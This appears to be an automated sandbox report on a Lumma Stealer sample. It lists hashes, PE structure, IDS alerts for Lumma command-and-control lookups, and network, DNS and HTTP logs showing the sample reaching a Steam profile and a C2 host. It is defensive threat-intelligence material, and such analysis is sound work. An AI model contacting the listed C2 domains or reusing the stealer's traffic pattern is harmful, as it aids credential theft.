                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.53.8
                                                                                                    • 104.102.49.254
                                                                                                    FdjDPFGTZS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                    • 104.21.53.8
                                                                                                    • 104.102.49.254
                                                                                                    No context
                                                                                                    No created / dropped files found
                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                    Entropy (8bit):7.948057708971282
                                                                                                    TrID:
                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                    File name:file.exe
                                                                                                    File size:1'872'384 bytes
                                                                                                    MD5:92dd1108dbdebf3163c394deb38b0278
                                                                                                    SHA1:e3a3638739deffd8b817a53b73f71cafbae978f6
                                                                                                    SHA256:5a8fb0d6f8d170f4a1054b55fd5ce72e195810d130ef6e72ea76ea9441dbb996
                                                                                                    SHA512:76a2c227ebfde9bb7a5b552b3ce7b95354ab439559c687b406d0ef85256d8921dd8f76ba73a5f4e9c2dc2cf6db4ee1204b2c49af74c869e7409a7259e25b972d
                                                                                                    SSDEEP:49152:0mZrOsi5Xy6A90bRGnWnTSU7cPju7eBLruvdsbZU:0gCsgCradHSU75eBmvdkZU
                                                                                                    TLSH:0D85334648F160D2FA7A59F6A32AC4C49E3967433676CCAA6C44483774817FEE1490FF
                                                                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f.............................0K...........@..........................`K...........@.................................W...k..
                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                    Entrypoint:0x8b3000
                                                                                                    Entrypoint Section:.taggant
                                                                                                    Digitally signed:false
                                                                                                    Imagebase:0x400000
                                                                                                    Subsystem:windows gui
                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                    Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                                                    TLS Callbacks:
                                                                                                    CLR (.Net) Version:
                                                                                                    OS Version Major:6
                                                                                                    OS Version Minor:0
                                                                                                    File Version Major:6
                                                                                                    File Version Minor:0
                                                                                                    Subsystem Version Major:6
                                                                                                    Subsystem Version Minor:0
                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                    Instruction
                                                                                                    jmp 00007FD834D6255Ah
                                                                                                    pshufw mm3, qword ptr [eax+eax], 00h
                                                                                                    add byte ptr [eax], al
                                                                                                    add cl, ch
                                                                                                    add byte ptr [eax], ah
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    0x10000x5d0000x25e00a8a9b76b0dea1e5ba7a896992a2f81adFalse0.9996196885313532data7.984055290084938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    0x600000x2b20000x200ff59d4fa1250167a0d0810c6e32e7530unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    uaabloyt0x3120000x1a00000x19f80065aa211f60b9c91400fe9f28ec89e625False0.9942581415463297data7.954325094548198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    wktppswf0x4b20000x10000x60013dbfe14fac1ce4172c5593c37a3fc6bFalse0.5950520833333334data5.069223584995856IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    .taggant0x4b30000x30000x2200d3b688343728c2039d25ba6275d42582False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                    DLLImport
                                                                                                    kernel32.dlllstrcpy
                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                    2024-10-07T23:23:13.871380+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.7494801.1.1.153UDP
                                                                                                    2024-10-07T23:23:13.888459+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.7501251.1.1.153UDP
                                                                                                    2024-10-07T23:23:13.899468+02002056483ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store)1192.168.2.7578551.1.1.153UDP
                                                                                                    2024-10-07T23:23:13.918586+02002056481ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store)1192.168.2.7538171.1.1.153UDP
                                                                                                    2024-10-07T23:23:13.927966+02002056479ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store)1192.168.2.7614611.1.1.153UDP
                                                                                                    2024-10-07T23:23:13.938398+02002056477ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store)1192.168.2.7536301.1.1.153UDP
                                                                                                    2024-10-07T23:23:13.949817+02002056475ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store)1192.168.2.7560851.1.1.153UDP
                                                                                                    2024-10-07T23:23:13.961689+02002056473ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site)1192.168.2.7629181.1.1.153UDP
                                                                                                    2024-10-07T23:23:16.436330+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749704104.21.53.8443TCP
                                                                                                    2024-10-07T23:23:16.436330+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749704104.21.53.8443TCP
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 7, 2024 23:23:13.984513044 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:13.984544039 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:13.984625101 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:13.987859964 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:13.987875938 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:14.631494045 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:14.631558895 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:14.635225058 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:14.635229111 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:14.635452032 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:14.681768894 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:14.723423958 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.147896051 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.147950888 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.147980928 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:15.147991896 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.148010015 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.148022890 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:15.148029089 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.148042917 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:15.148073912 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:15.148098946 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:15.246649027 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.246670961 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.246718884 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:15.246730089 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.246778965 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:15.251544952 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.251600027 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:15.251605034 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.251615047 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.251652956 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:15.278107882 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:15.278122902 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.278136015 CEST49702443192.168.2.7104.102.49.254
                                                                                                    Oct 7, 2024 23:23:15.278141022 CEST44349702104.102.49.254192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.291516066 CEST49704443192.168.2.7104.21.53.8
                                                                                                    Oct 7, 2024 23:23:15.291568041 CEST44349704104.21.53.8192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.291735888 CEST49704443192.168.2.7104.21.53.8
                                                                                                    Oct 7, 2024 23:23:15.297349930 CEST49704443192.168.2.7104.21.53.8
                                                                                                    Oct 7, 2024 23:23:15.297365904 CEST44349704104.21.53.8192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.752377033 CEST44349704104.21.53.8192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.752469063 CEST49704443192.168.2.7104.21.53.8
                                                                                                    Oct 7, 2024 23:23:15.851497889 CEST49704443192.168.2.7104.21.53.8
                                                                                                    Oct 7, 2024 23:23:15.851524115 CEST44349704104.21.53.8192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.852304935 CEST44349704104.21.53.8192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.853399038 CEST49704443192.168.2.7104.21.53.8
                                                                                                    Oct 7, 2024 23:23:15.853424072 CEST49704443192.168.2.7104.21.53.8
                                                                                                    Oct 7, 2024 23:23:15.853579044 CEST44349704104.21.53.8192.168.2.7
                                                                                                    Oct 7, 2024 23:23:16.436413050 CEST44349704104.21.53.8192.168.2.7
                                                                                                    Oct 7, 2024 23:23:16.436635971 CEST44349704104.21.53.8192.168.2.7
                                                                                                    Oct 7, 2024 23:23:16.436703920 CEST49704443192.168.2.7104.21.53.8
                                                                                                    Oct 7, 2024 23:23:16.436739922 CEST49704443192.168.2.7104.21.53.8
                                                                                                    Oct 7, 2024 23:23:16.436755896 CEST44349704104.21.53.8192.168.2.7
                                                                                                    Oct 7, 2024 23:23:16.436767101 CEST49704443192.168.2.7104.21.53.8
                                                                                                    Oct 7, 2024 23:23:16.436773062 CEST44349704104.21.53.8192.168.2.7
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 7, 2024 23:23:13.871380091 CEST4948053192.168.2.71.1.1.1
                                                                                                    Oct 7, 2024 23:23:13.883610964 CEST53494801.1.1.1192.168.2.7
                                                                                                    Oct 7, 2024 23:23:13.888458967 CEST5012553192.168.2.71.1.1.1
                                                                                                    Oct 7, 2024 23:23:13.897351027 CEST53501251.1.1.1192.168.2.7
                                                                                                    Oct 7, 2024 23:23:13.899467945 CEST5785553192.168.2.71.1.1.1
                                                                                                    Oct 7, 2024 23:23:13.917016029 CEST53578551.1.1.1192.168.2.7
                                                                                                    Oct 7, 2024 23:23:13.918586016 CEST5381753192.168.2.71.1.1.1
                                                                                                    Oct 7, 2024 23:23:13.926897049 CEST53538171.1.1.1192.168.2.7
                                                                                                    Oct 7, 2024 23:23:13.927966118 CEST6146153192.168.2.71.1.1.1
                                                                                                    Oct 7, 2024 23:23:13.936461926 CEST53614611.1.1.1192.168.2.7
                                                                                                    Oct 7, 2024 23:23:13.938397884 CEST5363053192.168.2.71.1.1.1
                                                                                                    Oct 7, 2024 23:23:13.947263002 CEST53536301.1.1.1192.168.2.7
                                                                                                    Oct 7, 2024 23:23:13.949816942 CEST5608553192.168.2.71.1.1.1
                                                                                                    Oct 7, 2024 23:23:13.959419012 CEST53560851.1.1.1192.168.2.7
                                                                                                    Oct 7, 2024 23:23:13.961688995 CEST6291853192.168.2.71.1.1.1
                                                                                                    Oct 7, 2024 23:23:13.970269918 CEST53629181.1.1.1192.168.2.7
                                                                                                    Oct 7, 2024 23:23:13.973159075 CEST6428353192.168.2.71.1.1.1
                                                                                                    Oct 7, 2024 23:23:13.980180979 CEST53642831.1.1.1192.168.2.7
                                                                                                    Oct 7, 2024 23:23:15.280800104 CEST5061253192.168.2.71.1.1.1
                                                                                                    Oct 7, 2024 23:23:15.289675951 CEST53506121.1.1.1192.168.2.7
                                                                                                    Oct 7, 2024 23:23:54.785949945 CEST5362309162.159.36.2192.168.2.7
                                                                                                    Oct 7, 2024 23:23:55.257914066 CEST53493241.1.1.1192.168.2.7
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Oct 7, 2024 23:23:13.871380091 CEST192.168.2.71.1.1.10x4e93Standard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.888458967 CEST192.168.2.71.1.1.10x34c9Standard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.899467945 CEST192.168.2.71.1.1.10xccd2Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.918586016 CEST192.168.2.71.1.1.10x5d6bStandard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.927966118 CEST192.168.2.71.1.1.10x5426Standard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.938397884 CEST192.168.2.71.1.1.10xc448Standard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.949816942 CEST192.168.2.71.1.1.10xff9eStandard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.961688995 CEST192.168.2.71.1.1.10x9cf8Standard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.973159075 CEST192.168.2.71.1.1.10x5ef9Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:15.280800104 CEST192.168.2.71.1.1.10x4a4cStandard query (0)sergei-esenin.comA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Oct 7, 2024 23:23:13.883610964 CEST1.1.1.1192.168.2.70x4e93Name error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.897351027 CEST1.1.1.1192.168.2.70x34c9Name error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.917016029 CEST1.1.1.1192.168.2.70xccd2Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.926897049 CEST1.1.1.1192.168.2.70x5d6bName error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.936461926 CEST1.1.1.1192.168.2.70x5426Name error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.947263002 CEST1.1.1.1192.168.2.70xc448Name error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.959419012 CEST1.1.1.1192.168.2.70xff9eName error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.970269918 CEST1.1.1.1192.168.2.70x9cf8Name error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:13.980180979 CEST1.1.1.1192.168.2.70x5ef9No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:15.289675951 CEST1.1.1.1192.168.2.70x4a4cNo error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                                                    Oct 7, 2024 23:23:15.289675951 CEST1.1.1.1192.168.2.70x4a4cNo error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                                    • steamcommunity.com
                                                                                                    • sergei-esenin.com
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.749702104.102.49.2544437100C:\Users\user\Desktop\file.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-07 21:23:14 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Host: steamcommunity.com
                                                                                                    2024-10-07 21:23:15 UTC1870INHTTP/1.1 200 OK
                                                                                                    Server: nginx
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                    Cache-Control: no-cache
                                                                                                    Date: Mon, 07 Oct 2024 21:23:15 GMT
                                                                                                    Content-Length: 34837
                                                                                                    Connection: close
                                                                                                    Set-Cookie: sessionid=325cf81e9f646aa2fce95d94; Path=/; Secure; SameSite=None
                                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                    2024-10-07 21:23:15 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                    2024-10-07 21:23:15 UTC16384INData Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f
                                                                                                    Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
                                                                                                    2024-10-07 21:23:15 UTC3768INData Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29
                                                                                                    Data Ascii: <div class="profile_summary_footer"><span data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
